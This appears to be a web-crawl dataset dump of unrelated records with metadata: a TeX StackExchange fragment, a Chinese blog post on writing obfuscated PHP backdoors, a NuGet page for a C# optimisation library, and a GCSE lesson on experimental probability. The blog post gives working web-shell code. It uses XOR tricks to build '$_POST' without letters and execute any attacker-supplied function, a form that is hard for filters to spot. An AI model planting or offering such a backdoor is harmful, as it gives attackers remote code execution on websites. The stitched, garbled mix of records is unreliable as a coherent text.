white]\n\\GraphInit[vstyle=Classic]\n\n\\tikzset{VertexStyle/.append style = {minimum size = 8pt, inner sep = 0pt, pattern=north east lines}}\n\n\\Vertices[unit=2]{circle}{a,b,c,d,e,f}\n\n% It's easy to change the color of a vertex!\n\\AddVertexColor{white}{a,d}\n\\Edges(a,b,c,d,e,f,a)\n\n\\end{tikzpicture}\n\\end{figure}\n\n\\end{document}\n\n\n# Output",
null,
""
] | [
null,
"https://i.stack.imgur.com/hHRac.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.8481343,"math_prob":0.807045,"size":880,"snap":"2019-13-2019-22","text_gpt3_token_len":254,"char_repetition_ratio":0.11757991,"word_repetition_ratio":0.03448276,"special_character_ratio":0.26136363,"punctuation_ratio":0.17679559,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99395543,"pos_list":[0,1,2],"im_url_duplicate_count":[null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-05-26T03:13:08Z\",\"WARC-Record-ID\":\"<urn:uuid:4fd59dc2-a285-4ace-8ec3-b86ace758902>\",\"Content-Length\":\"125474\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b1759ba4-cf45-49da-8a3a-4f7c1cd15c84>\",\"WARC-Concurrent-To\":\"<urn:uuid:f822180e-62ff-4180-a85b-e54034bef36f>\",\"WARC-IP-Address\":\"151.101.65.69\",\"WARC-Target-URI\":\"https://tex.stackexchange.com/questions/155437/how-can-i-fill-a-vertex-with-black-bars\",\"WARC-Payload-Digest\":\"sha1:GB2FA73TONQGAC3XXHBTXQLGIQTM3BCR\",\"WARC-Block-Digest\":\"sha1:33ITG7DMT2HZ2YQ7JLXPCN3MQH7BSI35\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-22/CC-MAIN-2019-22_segments_1558232258621.77_warc_CC-MAIN-20190526025014-20190526051014-00118.warc.gz\"}"} |
http://www.361way.com/abnormal-php-backdoor/3346.html | [
"## 编写变态的PHP后门\n\n2014年5月10日 发表评论 阅读评论\n\n(1)了解PHP\n\n(2)了解curl或者其他一些能够操作HTTP请求的工具\n\n```<?php\necho \"A\" ^ \"}\";\n?>```\n\n```<?php\n\\$_++;\n\\$__=\"<\"^\"}\";\n\\$__(\"stuff\");\n?>```\n\n(1)\\$_++;这行代码的意思是对变量名为\"_\"的变量进行自增操作,在PHP中未定义的变量默认值为null,null==false==0,我们可以在不使用任何数字的情况下,通过对未定义变量的自增操作来得到一个数字。\n\n(2)\\$__=\"<\"^\"}\";对字符\"<\"和\"}\"进行异或运算,得到结果A赋给变量名为\"__\"(两个下划线)的变量\n\n(3)\\$__(\"stuff\");通过上面的赋值操作,变量\\$__的值为A,所以这行可以看作是A(\"stuff\"),在PHP中,这行代码表示调用函数\nA,但是由于程序中并未定义函数A,所以这行代码会抛出一个致命错误使程序停止运行。这行代码没什么实际的意义,但是它能简单体现出在PHP中,我们可以\n\n```<?php\n@\\$_++; // \\$_ = 1\n\\$__=(\"#\"^\"|\"); // \\$__ = _\n\\$__.=(\".\"^\"~\"); // _P\n\\$__.=(\"/\"^\"`\"); // _PO\n\\$__.=(\"|\"^\"/\"); // _POS\n\\$__.=(\"{\"^\"/\"); // _POST\n\\${\\$__}[!\\$_](\\${\\$__}[\\$_]); // \\$_POST(\\$_POST);\n?>```\n\n`\\$__=(\"#\"^\"|\").(\".\"^\"~\").(\"/\"^\"`\").(\"|\"^\"/\").(\"{\"^\"/\");`\n\nYou can donate through PayPal.\nMy paypal id: [email protected]\nPaypal page: https://www.paypal.me/361way\n\n1. 本文目前尚无任何评论."
] | [
null
] | {"ft_lang_label":"__label__zh","ft_lang_prob":0.9329734,"math_prob":0.9951189,"size":1678,"snap":"2019-51-2020-05","text_gpt3_token_len":1223,"char_repetition_ratio":0.08064516,"word_repetition_ratio":0.0,"special_character_ratio":0.31048867,"punctuation_ratio":0.24056605,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96908593,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-09T05:14:41Z\",\"WARC-Record-ID\":\"<urn:uuid:7111e8ea-5d32-490a-9be3-45e4fa411863>\",\"Content-Length\":\"40483\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9dea2397-6791-47ae-a1d7-be70da1689d5>\",\"WARC-Concurrent-To\":\"<urn:uuid:54a11e6a-2e7f-409b-8532-57bea3bfa353>\",\"WARC-IP-Address\":\"47.99.240.20\",\"WARC-Target-URI\":\"http://www.361way.com/abnormal-php-backdoor/3346.html\",\"WARC-Payload-Digest\":\"sha1:M73XZA3LWYA56TQFJIEAG4UMU36HFPGN\",\"WARC-Block-Digest\":\"sha1:OE2DPKB645Z73SOSSQ4AURFDMTUEKYPH\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575540517557.43_warc_CC-MAIN-20191209041847-20191209065847-00084.warc.gz\"}"} |
https://www.nuget.org/packages/cs-estimation-of-distribution-algorithms/ | [
"",
null,
"cs-estimation-of-distribution-algorithms 1.0.1\n\nInstall-Package cs-estimation-of-distribution-algorithms -Version 1.0.1\ndotnet add package cs-estimation-of-distribution-algorithms --version 1.0.1\n<PackageReference Include=\"cs-estimation-of-distribution-algorithms\" Version=\"1.0.1\" />\nFor projects that support PackageReference, copy this XML node into the project file to reference the package.\n#r \"nuget: cs-estimation-of-distribution-algorithms, 1.0.1\"\n#r directive can be used in F# Interactive, C# scripting and .NET Interactive. Copy this into the interactive tool or source code of the script to reference the package.\n// Install cs-estimation-of-distribution-algorithms as a Cake Addin\n\n// Install cs-estimation-of-distribution-algorithms as a Cake Tool\n#tool nuget:?package=cs-estimation-of-distribution-algorithms&version=1.0.1\n\ncs-estimation-of-distribution-algorithms\n\nEstimation of Distribution Algorithms implemented in C#\n\nFeatures\n\nThe current library support optimization problems in which solutions are either binary-coded or continuous vectors. The algorithms implemented for estimation-of-distribution are listed below:\n\n• PBIL\n• CGA (Compact Genetic Algorithm)\n• BOA (Bayesian Optimization Algorithm)\n• UMDA (Univariate Marginal Distribution Algorithm)\n• Cross Entropy Method\n• MIMIC\n\nUsage\n\nSolving Continuous Optimization\n\nRunning PBIL\n\nThe sample codes below shows how to solve the \"Rosenbrock Saddle\" continuous optmization problem using PBIL:\n\nint popSize = 8000;\nPBIL s = new PBIL(popSize, f);\n\ns.SolutionUpdated += (best_solution, step) =>\n{\nConsole.WriteLine(\"Step {0}: Fitness = {1}\", step, best_solution.Cost);\n};\n\nint max_iterations = 200;\ns.Minimize(f, max_iterations);\n\nWhere the CostFunction_RosenbrockSaddle is the cost function that is defined as below:\n\n{\n: base(2, -2.048, 2.048) // 2 is the dimension of the continuous solution, -2.048 and 2.048 is the lower and upper bounds for the two dimensions\n{\n\n}\n\n{\ndouble x0 = solution;\ndouble x1 = solution;\ngrad = 400 * (x0 * x0 - x1) * x0 - 2 * (1 - x0);\ngrad = -200 * (x0 * x0 - x1);\n}\n\n// Optional: if not overriden, the default gradient esimator will be provided for gradient computation\nprotected override double _Evaluate(double[] solution) // compute the cost of problem given the solution\n{\ndouble x0 = solution;\ndouble x1 = solution;\n\ndouble cost =100 * Math.Pow(x0 * x0 - x1, 2) + Math.Pow(1 - x0, 2);\nreturn cost;\n}\n\n}\n\nRunning CGA\n\nThe sample codes below shows how to solve the \"Rosenbrock Saddle\" continuous optmization problem using CGA:\n\nint n = 1000; // sample size for the distribution\nCGA s = new CGA(n, f);\n\ns.SolutionUpdated += (best_solution, step) =>\n{\nConsole.WriteLine(\"Step {0}: Fitness = {1}\", step, best_solution.Cost);\n};\n\nint max_iterations = 2000000;\ns.Minimize(f, max_iterations);\n\nRunning UMDA\n\nThe sample codes below shows how to solve the \"Rosenbrock Saddle\" continuous optmization problem using UMDA:\n\nint popSize = 1000;\nint selectionSize = 100;\nUMDA s = new UMDA(popSize, selectionSize, f);\n\ns.SolutionUpdated += (best_solution, step) =>\n{\nConsole.WriteLine(\"Step {0}: Fitness = {1}\", step, best_solution.Cost);\n};\n\nint max_iterations = 2000000;\ns.Minimize(f, max_iterations);\n\nRunning MIMIC\n\nThe sample codes below shows how to solve the \"Rosenbrock Saddle\" continuous optmization problem using MIMIC:\n\nint n = 1000; // population size\nMIMIC s = new MIMIC(n, f);\n\ns.SolutionUpdated += (best_solution, 
step) =>\n{\nConsole.WriteLine(\"Step {0}: Fitness = {1}\", step, best_solution.Cost);\n};\n\nint max_iterations = 2000000;\ns.Minimize(f, max_iterations);\n\nRunning CrossEntropyMethod\n\nThe sample codes below shows how to solve the \"Rosenbrock Saddle\" continuous optmization problem using CrossEntropyMethod:\n\nint sampleSize = 1000;\nint selectionSize = 100;\nCrossEntropyMethod s = new CrossEntropyMethod(sampleSize, selectionSize, f);\n\ns.SolutionUpdated += (best_solution, step) =>\n{\nConsole.WriteLine(\"Step {0}: Fitness = {1}\", step, best_solution.Cost);\n};\n\nint max_iterations = 2000000;\ns.Minimize(f, max_iterations);\n\nSolving Problems with Binary-encoded Solutions\n\nRunning PBIL\n\nThe samle codes below show how to solve a canonical optimization problem that look for solutions with minimum number of 1 bits in the solution:\n\nint popSize = 8000;\nint dimension = 50;\nint eliteCount = 50;\nPBIL s = new PBIL(popSize, dimension, eliteCount);\ns.MaxIterations = 100;\n\ns.SolutionUpdated += (best_solution, step) =>\n{\nConsole.WriteLine(\"Step {0}: Fitness = {1}\", step, best_solution.Cost);\n};\n\ns.Minimize((solution, constraints) =>\n{\n// solution is binary-encoded\ndouble cost = 0;\n// minimize the number of 1 bits in the solution\nfor(int i=0; i < solution.Length; ++i)\n{\ncost += solution[i];\n}\nreturn cost;\n});\n\nRunning CGA\n\nThe samle codes below show how to solve a canonical optimization problem that look for solutions with minimum number of 1 bits in the solution:\n\nint sampleSize = 8000;\nint dimension = 50;\nint sampleSelectionSize = 100;\nCGA s = new CGA(sampleSize, dimension, sampleSelectionSize);\ns.MaxIterations = 100;\n\ns.SolutionUpdated += (best_solution, step) =>\n{\nConsole.WriteLine(\"Step {0}: Fitness = {1}\", step, best_solution.Cost);\n};\n\ns.Minimize((solution, constraints) =>\n{\n// solution is binary-encoded\ndouble cost = 0;\n// minimize the number of 1 bits in the solution\nfor(int i=0; i < solution.Length; ++i)\n{\ncost += solution[i];\n}\nreturn cost;\n});\n\nRunning UMDA\n\nThe samle codes below show how to solve a canonical optimization problem that look for solutions with minimum number of 1 bits in the solution:\n\nint sampleSize = 8000;\nint dimension = 50;\nint sampleSelectionSize = 100;\nUMDA s = new UMDA(sampleSize, dimension, sampleSelectionSize);\ns.MaxIterations = 100;\n\ns.SolutionUpdated += (best_solution, step) =>\n{\nConsole.WriteLine(\"Step {0}: Fitness = {1}\", step, best_solution.Cost);\n};\n\ns.Minimize((solution, constraints) =>\n{\n// solution is binary-encoded\ndouble cost = 0;\n// minimize the number of 1 bits in the solution\nfor(int i=0; i < solution.Length; ++i)\n{\ncost += solution[i];\n}\nreturn cost;\n});\n\nTODO\n\n• BOA algorithm still has bugs, will need to be fixed in the future release.\n\nThis package has no dependencies.\n\nNuGet packages\n\nThis package is not used by any NuGet packages.\n\nGitHub repositories\n\nThis package is not used by any popular GitHub repositories."
] | [
null,
"https://api.nuget.org/v3-flatcontainer/cs-estimation-of-distribution-algorithms/1.0.1/icon",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.6279394,"math_prob":0.9880993,"size":6806,"snap":"2022-05-2022-21","text_gpt3_token_len":1829,"char_repetition_ratio":0.1461335,"word_repetition_ratio":0.49610677,"special_character_ratio":0.27475756,"punctuation_ratio":0.20259741,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99814856,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-01-28T00:07:55Z\",\"WARC-Record-ID\":\"<urn:uuid:8974c6bc-2842-445b-aad3-a9cbb2324acb>\",\"Content-Length\":\"49809\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9f6d63ed-a781-4568-8f27-0ec514b5723f>\",\"WARC-Concurrent-To\":\"<urn:uuid:b6552205-12d7-4de2-abf6-e667714ff00c>\",\"WARC-IP-Address\":\"52.240.159.111\",\"WARC-Target-URI\":\"https://www.nuget.org/packages/cs-estimation-of-distribution-algorithms/\",\"WARC-Payload-Digest\":\"sha1:I47JII2LKOU6CFZ3K7SAHEB4HSI3O33V\",\"WARC-Block-Digest\":\"sha1:NCF6JUW32WKUSJ23RFPA4SBIPNK37L2Q\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-05/CC-MAIN-2022-05_segments_1642320305317.17_warc_CC-MAIN-20220127223432-20220128013432-00690.warc.gz\"}"} |
https://www.bloomsvilla.com/collections/pink-color-flowers?view=amp | [
"Rs. 599.00\nRs. 2,049.00\nRs. 799.00\nRs. 449.00\nRs. 1,299.00\nRs. 3,599.00\nRs. 1,099.00\nRs. 1,349.00\nRs. 549.00\nRs. 499.00\nRs. 799.00\nRs. 1,249.00\nRs. 799.00\nRs. 549.00\nRs. 2,199.00\nRs. 1,699.00\nRs. 1,599.00\nRs. 799.00\nRs. 1,849.00\nRs. 699.00\nRs. 699.00\nRs. 599.00\nRs. 1,499.00\nRs. 799.00\nRs. 2,499.00\nRs. 1,299.00\nRs. 599.00\nRs. 699.00\nRs. 1,899.00\nRs. 1,999.00\nRs. 1,199.00\nRs. 1,199.00\nRs. 1,199.00\nRs. 1,899.00\nRs. 2,899.00\nRs. 1,399.00\nRs. 1,699.00\nRs. 1,849.00\nRs. 1,349.00\nRs. 2,199.00\nRs. 3,199.00\nRs. 2,049.00\nRs. 749.00\nRs. 749.00\nRs. 1,649.00\nRs. 1,499.00\nRs. 749.00\nRs. 1,899.00"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.55550414,"math_prob":0.9991848,"size":3202,"snap":"2022-27-2022-33","text_gpt3_token_len":1164,"char_repetition_ratio":0.20419012,"word_repetition_ratio":0.007782101,"special_character_ratio":0.32948157,"punctuation_ratio":0.2032967,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99136513,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-06-30T20:21:45Z\",\"WARC-Record-ID\":\"<urn:uuid:05b56387-e280-44f9-adc4-8ef8b7df4505>\",\"Content-Length\":\"224916\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:97df99f8-f64d-4aac-96de-26f847244e7c>\",\"WARC-Concurrent-To\":\"<urn:uuid:64b3ebc1-00d7-4b6f-90c2-4e43e513e93b>\",\"WARC-IP-Address\":\"23.227.38.74\",\"WARC-Target-URI\":\"https://www.bloomsvilla.com/collections/pink-color-flowers?view=amp\",\"WARC-Payload-Digest\":\"sha1:YYP63WGRAJD22XRJFW2CCMQF7U4PUICM\",\"WARC-Block-Digest\":\"sha1:JB5RC327CZDUZNUMQBWZ7DL2PIRT7TAI\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656103877410.46_warc_CC-MAIN-20220630183616-20220630213616-00213.warc.gz\"}"} |
https://thirdspacelearning.com/gcse-maths/probability/experimental-probability/ | [
"# Experimental Probability\n\nHere we will learn about experimental probability, including using the relative frequency and finding the probability distribution.\n\nThere are also probability distribution worksheets based on Edexcel, AQA and OCR exam questions, along with further guidance on where to go next if you’re still stuck.\n\n## What is experimental probability?\n\nExperimental probability is the probability of an event happening based on an experiment or observation.\n\nTo calculate the experimental probability of an event, we calculate the relative frequency of the event.\n\n\\text{Relative frequency = }\\frac{\\text{frequency of event occurring}}{\\text{total number of trials of the experiment}}\n\nWe can also express this as R=\\frac{f}{n} where R is the relative frequency, f is the frequency of the event occurring, and n is the number of trials of the experiment.\n\nIf we find the relative frequency for all possible events from the experiment we can write the probability distribution for that experiment.\n\nThe relative frequency, experimental probability and empirical probability are the same thing and are calculated using the data from random experiments. They also have a key use in real-life problem solving.\n\nFor example, Jo made a four-sided spinner out of cardboard and a pencil.\n\nShe spun the spinner 50 times. The table shows the number of times the spinner landed on each of the numbers 1 to 4. The final column shows the relative frequency.\n\nThe relative frequencies of all possible events will add up to 1.\n\n0.12 + 0.26 + 0.3 + 0.32 = 1\n\nThis is because the events are mutually exclusive.\n\nStep-by-step guide: Mutually exclusive events\n\n### What is experimental probability?",
null,
"### Experimental probability vs theoretical probability\n\nYou can see that the relative frequencies are not equal to the theoretical probabilities we would expect if the spinner was fair.\n\nIf the spinner is fair, the more times an experiment is done the closer the relative frequencies should be to the theoretical probabilities.\n\nIn this case the theoretical probability of each section of the spinner would be 0.25, or \\frac{1}{4}.\n\nStep-by-step guide: Theoretical probability\n\n## How to find an experimental probability distribution\n\nIn order to calculate an experimental probability distribution:\n\n1. Draw a table showing the frequency of each outcome in the experiment.\n2. Determine the total number of trials.\n3. Write the experimental probability (relative frequency) of the required outcome(s).\n\n### Explain how to find an experimental probability distribution",
null,
"### Related lessons onprobability distribution\n\nExperimental probability is part of our series of lessons to support revision on probability distribution. You may find it helpful to start with the main probability distribution lesson for a summary of what to expect, or use the step by step guides below for further detail on individual topics. Other lessons in this series include:\n\n## Experimental probability examples\n\n### Example 1: finding an experimental probability distribution\n\nA 3 sided spinner numbered 1,2, and 3 is spun and the results recorded.\n\nFind the probability distribution for the 3 sided spinner from these experimental results.\n\n1. Draw a table showing the frequency of each outcome in the experiment.\n\nA table of results has already been provided. We can add an extra column for the relative frequencies.\n\n2Determine the total number of trials\n\n37 + 49 + 24 = 110\n\n3Write the experimental probability (relative frequency) of the required outcome(s).\n\nDivide each frequency by 110 to find the relative frequencies.\n\n### Example 2: finding an experimental probability distribution\n\nA normal 6 sided die is rolled 50 times. A tally chart was used to record the results.\n\nDetermine the probability distribution for the 6 sided die. Give your answers as decimals.\n\nUse the tally chart to find the frequencies and add a row for the relative frequencies.\n\nThe question stated that the experiment had 50 trials. We can also check that the frequencies add to 50.\n\nDivide each frequency by 50 to find the relative frequencies.\n\n### Example 3: using an experimental probability distribution\n\nA student made a biased die and wanted to find its probability distribution for use in a game. They rolled the die 100 times and recorded the results.\n\nBy calculating the probability distribution for the die, determine the probability of the die landing on a 3 or a 4.\n\nA table of results has already been provided. We can add an extra column for the relative frequencies.\n\nThe die was rolled 100 times.\n\nWe can find the probability of rolling a 3 or a 4 by adding the relative frequencies for those numbers.\n\nP(3 or 4) = 0.22 + 0.25 = 0.47\n\n### Example 4: calculating the relative frequency without a known frequency of outcomes\n\nA research study asked 1200 people how they commute to work. 640 travelled by car, 174 used the bus, and the rest walked. Determine the relative frequency of someone not commuting to work by car.\n\nWriting the known information into a table, we have\n\nWe currently do not know the frequency of people who walked to work. We can calculate this as we know the total frequency.\n\nThe number of people who walked to work is equal to\n\n1200-(640+174)=386.\n\nWe now have the full table,\n\nThe total frequency is 1200.\n\nDivide each frequency by the total number of people (1200), we have\n\nThe relative frequency of someone walking to work is 0.321\\dot{6} .\n\n## How to find a frequency using an experimental probability\n\nIn order to calculate a frequency using an experimental probability:\n\n1. Multiply the total frequency by the experimental probability.\n\n### Explain how to find a frequency using an experimental probability",
null,
"### Example 5: calculating a frequency\n\nA dice was rolled 300 times. The experimental probability of rolling an even number is \\frac{27}{50}. How many times was an even number rolled?\n\n300\\times\\frac{27}{50}=6\\times{27}=162\n\nAn even number was rolled 162 times.\n\n### Example 6: calculating a frequency\n\nA bag contains different coloured counters. A counter is selected at random and replaced back into the bag 240 times. The probability distribution of the experiment is given below.\n\nDetermine the number of times a blue counter was selected.\n\nAs the events are mutually exclusive, the sum of the probabilities must be equal to 1. This means that we can determine the value of x.\n\n1-(0.4+0.25+0.15)=0.2\n\nThe experimental probability (relative frequency) of a blue counter is 0.2.\n\nMultiplying the total frequency by 0.1, we have\n\n240 \\times 0.2=48.\n\nA blue counter was selected 48 times.\n\n### Common misconceptions\n\n• Forgetting the differences between theoretical and experimental probability\n\nIt is common to forget to use the relative frequencies from experiments for probability questions and use the theoretical probabilities instead.\n\nFor example, they may be asked to find the probability of a die landing on an even number based on an experiment and the student will incorrectly answer it as 0.5.\n\n• The relative frequency is not an integer\n\nThe relative frequency is the same as the experimental probability. This value is written as a fraction, decimal or percentage, not an integer.\n\n### Practice experimental probability questions\n\n1. A coin is flipped 80 times and the results recorded.",
null,
"Determine the probability distribution of the coin.",
null,
"",
null,
"",
null,
"",
null,
"",
null,
"",
null,
"",
null,
"",
null,
"As the number of tosses is 80, dividing the frequencies for the number of heads and the number of tails by 80, we have\n\n34\\div{80}=0.425\n\n46\\div{80}=0.575\n\n2. A 6 sided die is rolled 160 times and the results recorded.",
null,
"Determine the probability distribution of the die. Write your answers as fractions in their simplest form.",
null,
"",
null,
"",
null,
"",
null,
"",
null,
"",
null,
"",
null,
"",
null,
"Dividing the frequencies of each number by 160, we get",
null,
"3. A 3 -sided spinner is spun and the results recorded.",
null,
"Find the probability distribution of the spinner, giving you answers as decimals to 2 decimal places.",
null,
"",
null,
"",
null,
"",
null,
"",
null,
"",
null,
"",
null,
"",
null,
"Dividing the frequencies of each colour by 128 and simplifying, we have",
null,
"4. A 3 -sided spinner is spun and the results recorded.",
null,
"Find the probability of the spinner not landing on red. Give your answer as a fraction.\n\n\\frac{19}{64}",
null,
"\\frac{2}{3}",
null,
"\\frac{45}{64}",
null,
"\\frac{9}{10}",
null,
"Add the frequencies of blue and green and divide by 128.\n\n5. A card is picked at random from a deck and then replaced. This was repeated 4000 times. The probability distribution of the experiment is given below.",
null,
"How many times was a club picked?\n\n701",
null,
"1056",
null,
"33",
null,
"4000",
null,
"4000\\times\\frac{33}{125}=1056",
null,
"6. Find the missing frequency from the probability distribution.",
null,
"45",
null,
"80",
null,
"34",
null,
"36",
null,
"The total frequency is calculated by dividing the frequency by the relative frequency.\n\n16\\div{0.2}=80\n\n80-(16+28)=36\n\n### Experimental probability GCSE questions\n\n1. A 4 sided spinner was spun in an experiment and the results recorded.",
null,
"(b) Find the probability of the spinner landing on a square number.\n\n(5 marks)\n\n(a)\n\nTotal frequency of 80.\n\n(1)\n\n2 relative frequencies correct.\n\n(1)\n\nAll 4 relative frequencies correct 0.225, \\ 0.2, \\ 0.3375, \\ 0.2375.\n\n(1)\n\n(b)\n\nRelative frequencies of 1 and 4 used.\n\n(1)\n\n0.4625 or equivalent\n\n(1)\n\n2. A 3 sided spinner was spun and the results recorded.\n\nComplete the table.",
null,
"(4 marks)\n\n1-0.3-0.25 = 0.45\n\n(1)\n\nProcess to find total frequency or use of ratio with 36 and 0.3.\n\n(1)\n\n30\n\n(1)\n\n54\n\n(1)",
null,
"3. Ben flipped a coin 20 times and recorded the results.",
null,
"(a) Ben says, “the coin must be biased because I got a lot more heads than tails”.\n\nComment on Ben’s statement.\n\n(b) Fred takes the same coin and flips it another 80 times and records the results.",
null,
"Use the information to find a probability distribution for the coin.",
null,
"(6 marks)\n\n(a)\n\nStating that Ben’s statement may be false.\n\n(1)\n\nMentioning that 20 times is not enough trials.\n\n(1)\n\n(b)\n\nEvidence of use of both sets of results from Ben and Fred.\n\n(1)\n\nProcess of dividing by 100.\n\n(1)\n\n(1)\n\nP(tails) = 0.52 or equivalent\n\n(1)\n\n## Learning checklist\n\nYou have now learned how to:\n\n• Use a probability model to predict the outcomes of future experiments; understand that empirical unbiased samples tend towards theoretical probability distributions, with increasing sample size\n\n## Still stuck?\n\nPrepare your KS4 students for maths GCSEs success with Third Space Learning. Weekly online one to one GCSE maths revision lessons delivered by expert maths tutors.\n\nFind out more about our GCSE maths tuition programme."
] | [
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-what-is-card.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-Probability-how-to-card-1.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-Probability-how-to-card-2.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-practice-question-1-image-1-300x76.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-practice-question-1-image-2-300x112.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/cancel.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-practice-question-1-image-3-300x112.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/check_circle_24px.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-practice-question-1-image-6-300x112.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/cancel.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-practice-question-1-image-5-300x112.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/cancel.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-practice-question-2-image-1-300x246.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-practice-question-2-image-2-300x246.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/cancel.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-practice-question-2-image-3-300x246.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/cancel.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-practice-question-2-correct-answer-1-300x246.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/check_circle_24px.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-practice-question-2-correct-answer-2-300x246.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/cancel.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-practice-question-2-explanation-image-300x175.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-practice-question-3-300x142.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-practice-question-3-correct-answer-1-300x141.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/check_circle_24px.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-practice-question-3-correct-answer-2-300x142.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/cancel.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-practice-question-3-correct-answer-5-300x141.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/cancel.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-practice-question-3-correct-answer-4-300x141.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/cancel.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-practice-question-3-explanation-image-300x101.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-practice-question-4-300x141.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/cancel.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/cancel.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/check_circle_24px.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/cancel.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-practice-question-5-300x50.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/cancel.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/check_circle_24px.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/cancel.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/cancel.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-practice-question-5-explanation-image-300x70.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-practice-question-6-300x117.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/cancel.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/cancel.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/cancel.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/check_circle_24px.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-gcse-question-1-300x147.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-gcse-question-2-image-1-300x117.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-gcse-question-2-image-2-300x117.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-gcse-question-3-300x107.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-gcse-question-3a-300x107.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-gcse-question-3b-300x107.png",
null
